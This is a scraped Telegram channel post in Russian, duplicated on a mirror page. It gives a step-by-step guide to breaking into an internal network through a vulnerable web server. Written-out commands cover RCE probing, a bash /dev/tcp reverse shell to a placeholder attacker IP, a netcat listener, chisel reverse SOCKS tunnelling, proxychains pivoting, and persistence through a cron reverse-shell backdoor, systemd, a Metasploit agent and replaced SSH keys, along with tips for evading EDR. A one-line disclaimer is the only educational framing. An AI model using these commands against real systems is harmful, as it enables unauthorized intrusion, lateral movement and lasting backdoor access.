Telegram Group & Telegram Channel
Как получить доступ к внутренней сети через уязвимый веб-сервер

Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.

1️⃣ Сканируем на наличие RCE

➡️ Используем nmap с NSE-скриптами:

nmap -p 80,443 --script http-vuln* <target_ip>

➡️ Проводим ручной fuzzing параметров через:

— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:

curl "http://target.com/test.php?cmd=id"

⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.

2️⃣ Эксплуатируем уязвимость

Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.

➡️ Используем наиболее совместимый вариант — bash или nc:

# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'


➡️ Варианты на случай отсутствия bash:

python3 -c 'import socket,os,...'
php -r '...reverse shell...'
perl, nc -e, curl | sh — в зависимости от окружения


3️⃣ Получаем доступ и готовим туннель

➡️ Слушаем на своей машине:

nc -lvnp 4444

➡️ Получив оболочку, загружаем туннелирование-инструмент:

Например, chisel:

# На атакующей машине
chisel server -p 8000 --reverse


# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks

⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)

4️⃣ Пивотинг во внутреннюю сеть

➡️ Используем proxychains:

Настрой файл /etc/proxychains.conf на:

socks5 127.0.0.1 1080

➡️ Проверяем доступность внутренних хостов:

proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24

⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.

5️⃣ Укрепляем доступ

➡️ Ставим бекдор для повторного входа:

- cronjob: * * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1

- systemd: .service с автозапуском

- загрузка агента Metasploit

- использование ssh-keygen и подмена .ssh/authorized_keys

🧠 Примечания:

• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.

⚠️ Disclaimer:

Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.

🐸 Библиотека хакера

#буст
Please open Telegram to view this post
VIEW IN TELEGRAM



tg-me.com/hackproglib/4116
Create:
Last Update:

Как получить доступ к внутренней сети через уязвимый веб-сервер

Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.

1️⃣ Сканируем на наличие RCE

➡️ Используем nmap с NSE-скриптами:

nmap -p 80,443 --script http-vuln* <target_ip>

➡️ Проводим ручной fuzzing параметров через:

— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:

curl "http://target.com/test.php?cmd=id"

⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.

2️⃣ Эксплуатируем уязвимость

Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.

➡️ Используем наиболее совместимый вариант — bash или nc:

# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'


➡️ Варианты на случай отсутствия bash:

python3 -c 'import socket,os,...'
php -r '...reverse shell...'
perl, nc -e, curl | sh — в зависимости от окружения


3️⃣ Получаем доступ и готовим туннель

➡️ Слушаем на своей машине:

nc -lvnp 4444

➡️ Получив оболочку, загружаем туннелирование-инструмент:

Например, chisel:

# На атакующей машине
chisel server -p 8000 --reverse


# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks

⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)

4️⃣ Пивотинг во внутреннюю сеть

➡️ Используем proxychains:

Настрой файл /etc/proxychains.conf на:

socks5 127.0.0.1 1080

➡️ Проверяем доступность внутренних хостов:

proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24

⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.

5️⃣ Укрепляем доступ

➡️ Ставим бекдор для повторного входа:

- cronjob: * * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1

- systemd: .service с автозапуском

- загрузка агента Metasploit

- использование ssh-keygen и подмена .ssh/authorized_keys

🧠 Примечания:

• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.

⚠️ Disclaimer:

Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.

🐸 Библиотека хакера

#буст

BY Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность




Share with your friend now:
tg-me.com/hackproglib/4116

View MORE
Open in Telegram


Библиотека хакера | Hacking Infosec ИБ информационная безопасность Telegram | DID YOU KNOW?

Date: |

Dump Scam in Leaked Telegram Chat

A leaked Telegram discussion by 50 so-called crypto influencers has exposed the extraordinary steps they take in order to profit on the back off unsuspecting defi investors. According to a leaked screenshot of the chat, an elaborate plan to defraud defi investors using the worthless “$Few” tokens had been hatched. $Few tokens would be airdropped to some of the influencers who in turn promoted these to unsuspecting followers on Twitter.

How Does Telegram Make Money?

Telegram is a free app and runs on donations. According to a blog on the telegram: We believe in fast and secure messaging that is also 100% free. Pavel Durov, who shares our vision, supplied Telegram with a generous donation, so we have quite enough money for the time being. If Telegram runs out, we will introduce non-essential paid options to support the infrastructure and finance developer salaries. But making profits will never be an end-goal for Telegram.

Библиотека хакера | Hacking Infosec ИБ информационная безопасность from ye


Telegram Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
FROM USA